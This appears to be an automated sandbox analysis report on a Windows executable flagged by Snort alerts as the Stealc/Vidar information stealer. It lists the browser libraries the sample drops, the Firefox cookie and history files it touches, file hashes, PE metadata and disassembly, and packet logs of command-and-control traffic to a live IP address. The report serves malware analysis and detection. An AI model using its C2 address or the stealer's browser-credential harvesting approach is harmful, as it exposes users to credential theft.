SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\jlO7971vUz.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.511943181736937
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jlO7971vUz.exe
File size:	15'461'583 bytes
MD5:	4bfe7a656d28f578ca10aba4c225ff41
SHA1:	abbff97043065c3ad54d826b2999f84d4a013b1e
SHA256:	00bb7850e80e07facb1d30a0d41b271469905a2b856eb80d1d34bdff21130985
SHA512:	a155b61fb2963407b39cf0b5f38b40f9e95f6525896fc84ffce2ccd69e2f335cf6f3592d19c1993492457797ca4457a73a608d7890f4bbad06f12e8191a16fc8
SSDEEP:	393216:NqGKs44oI6PGP00RnLZx0qdu2GZJwlKZrOk3Qz:Nq1sXoI6PGP08LZ3svE1z
TLSH:	63F633F2EC05068BD49A18F809607BB702FF8FF4FAA8D19B4581B575B57B8CD006A9D1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................i{d.............................5Z......5Z......5Z..................k....Y.......Y.....

File Icon


Icon Hash:	0721595964651b0b

Static PE Info

General

Entrypoint:	0x4088b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x667AF99D [Tue Jun 25 17:08:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	69232e68719e79778f94e709ff610c51

Entrypoint Preview

Instruction
call 00007F90AC6CC31Bh
jmp 00007F90AC6CB93Fh
int3
int3
push ebx
push esi
mov eax, dword ptr [esp+18h]
or eax, eax
jne 00007F90AC6CBADAh
mov ecx, dword ptr [esp+14h]
mov eax, dword ptr [esp+10h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, dword ptr [esp+0Ch]
div ecx
mov edx, ebx
jmp 00007F90AC6CBB03h
mov ecx, eax
mov ebx, dword ptr [esp+14h]
mov edx, dword ptr [esp+10h]
mov eax, dword ptr [esp+0Ch]
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jne 00007F90AC6CBAB6h
div ebx
mov esi, eax
mul dword ptr [esp+18h]
mov ecx, eax
mov eax, dword ptr [esp+14h]
mul esi
add edx, ecx
jc 00007F90AC6CBAD0h
cmp edx, dword ptr [esp+10h]
jnbe 00007F90AC6CBACAh
jc 00007F90AC6CBAC9h
cmp eax, dword ptr [esp+0Ch]
jbe 00007F90AC6CBAC3h
dec esi
xor edx, edx
mov eax, esi
pop esi
pop ebx
retn 0010h
int3
int3
int3
int3
int3
int3
int3
int3
push ebx
mov eax, dword ptr [esp+14h]
or eax, eax
jne 00007F90AC6CBADAh
mov ecx, dword ptr [esp+10h]
mov eax, dword ptr [esp+0Ch]
xor edx, edx
div ecx
mov eax, dword ptr [esp+08h]
div ecx
mov eax, edx
xor edx, edx
jmp 00007F90AC6CBB12h
mov ecx, eax
mov ebx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
mov eax, dword ptr [esp+08h]
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jne 00007F90AC6CBAB6h
div ebx
mov ecx, eax
mul dword ptr [esp+14h]
xchg eax, ecx
mul dword ptr [esp+10h]
add edx, ecx
jc 00007F90AC6CBAD0h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17ec0	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x912f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xef0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x15ae0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x15b40	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x15a20	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x1a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10a84	0x10c00	812fc322d4d6e8ba2a5c9f7d39651867	False	0.5377798507462687	data	6.562713845676264	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x66b2	0x6800	e6246a88c47756d21453f278571e3843	False	0.5235501802884616	data	5.610174670457807	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0xc6c	0x600	eb38a2b2a33d5ab38c9fb35b615d4484	False	0.2682291666666667	DOS executable (block device driver)	3.970028837082745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x912f4	0x91400	b5d78d4b8e094aa6907e60d78eadd3e5	False	0.47740795772375216	data	6.017344624750942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xef0	0x1000	27d0461d87634a32a1a4f1778995575a	False	0.759521484375	data	6.376693292643013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1a288	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7331560283687943
RT_ICON	0x1a6f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.6647540983606557
RT_ICON	0x1b078	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.6144465290806754
RT_ICON	0x1c120	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.5384854771784232
RT_ICON	0x1e6c8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.48860415682569674
RT_ICON	0x228f0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	0.4685304990757856
RT_ICON	0x27d78	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	0.42752785368929996
RT_ICON	0x31220	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.3888264521471667
RT_ICON	0x41a48	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144	0.28546912447850403
RT_RCDATA	0x83a70	0x27800	data	0.8491519976265823
RT_GROUP_ICON	0xab270	0x84	data	0.7121212121212122

Imports

DLL

Import

KERNEL32.dll

SizeofResource, GetCurrentProcess, FindResourceA, LoadLibraryA, LoadResource, GetProcAddress, GetModuleHandleExW, FreeLibrary, ExitProcess, LCIDToLocaleName, VirtualQuery, GetStartupInfoW, IsDebuggerPresent, InitializeSListHead, GetCurrentThreadId, GetCurrentProcessId, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, LCMapStringEx, MultiByteToWideChar, GetLocaleInfoEx, DecodePointer, EncodePointer, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, Sleep, WideCharToMultiByte, QueryPerformanceFrequency, QueryPerformanceCounter

msvcrt.dll

___lc_handle_func, _XcptFilter, __set_app_type, __getmainargs, wctomb_s, _ismbblead, _acmdln, ?_set_new_mode@@YAHH@Z, _msize, ?terminate@@YAXXZ, _isatty, _fileno, _CIlog10, ceil, _clearfp, strtol, strnlen, _iob, _unlock, _lock, strcpy_s, _controlfp_s, __p__commode, _set_fmode, _initterm_e, _initterm, _callnewh, wcsnlen, tolower, __strncnt, realloc, abort, islower, ___mb_cur_max_func, _errno, _wcsdup, ___lc_codepage_func, isupper, __pctype_func, rand_s, malloc, ungetc, setvbuf, _fseeki64, fsetpos, fread, fgetpos, fgetc, fflush, fclose, frexp, free, strcspn, calloc, cos, _amsg_exit, _except_handler4_common, memset, memmove, memcpy, _CxxThrowException, __CxxFrameHandler3, strchr, wcsrchr, strrchr, sqrt, sin

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/01/24-13:02:05.496717	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49705	80	192.168.2.5	147.45.78.162
07/01/24-13:02:05.700850	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49705	147.45.78.162	192.168.2.5
07/01/24-13:02:04.635837	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49705	80	192.168.2.5	147.45.78.162
07/01/24-13:02:05.493573	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49705	147.45.78.162	192.168.2.5
07/01/24-13:02:05.288270	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49705	80	192.168.2.5	147.45.78.162

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 13:02:04.571037054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:04.635442972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:04.635565042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:04.635837078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:04.640976906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.286508083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.286576986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.288269997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.293216944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.493572950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.493640900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.494684935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.494729042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.496716976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.502315998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.700850010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.701006889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.701958895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.701972008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.702020884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.704854012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.704885960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.704926968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.709955931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.710011005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.711464882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.716444016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.913609028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.913741112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.936443090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.936505079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:05.942292929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.942303896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.942420006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.942492962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.942502022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.942672968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:05.942682981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:06.147423983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:06.147587061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:06.799196959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:06.806965113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.003245115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.003446102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.004036903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.004049063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.004096031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.006259918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.006314039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.008032084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.008044958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.008083105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.010155916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.010168076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.010200977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.013302088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.013350964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.013660908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.013700962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.015044928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.015054941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.015093088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.015113115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.016644955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.016657114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.016690969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.016730070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.026674986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.026808023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.027030945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.027040958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.027113914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.027134895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.029393911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.029468060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.029628038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.029637098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.029681921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.032917023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.032980919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.033420086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.033430099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.033476114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.035494089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.035557032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.036278963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.036288023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.036326885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.036345959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.095005035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.095130920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.095462084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.095474958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.095602989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.097317934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.097377062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.097925901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.097975969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.098773003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.098784924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.098823071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.100764990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.100778103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.100788116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.100816011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.100838900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.102509975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.102524996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.102559090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.102571011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.104532957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.104545116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.104554892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.104584932 CEST	49705	80	192.168.2.5	147.45.78.162
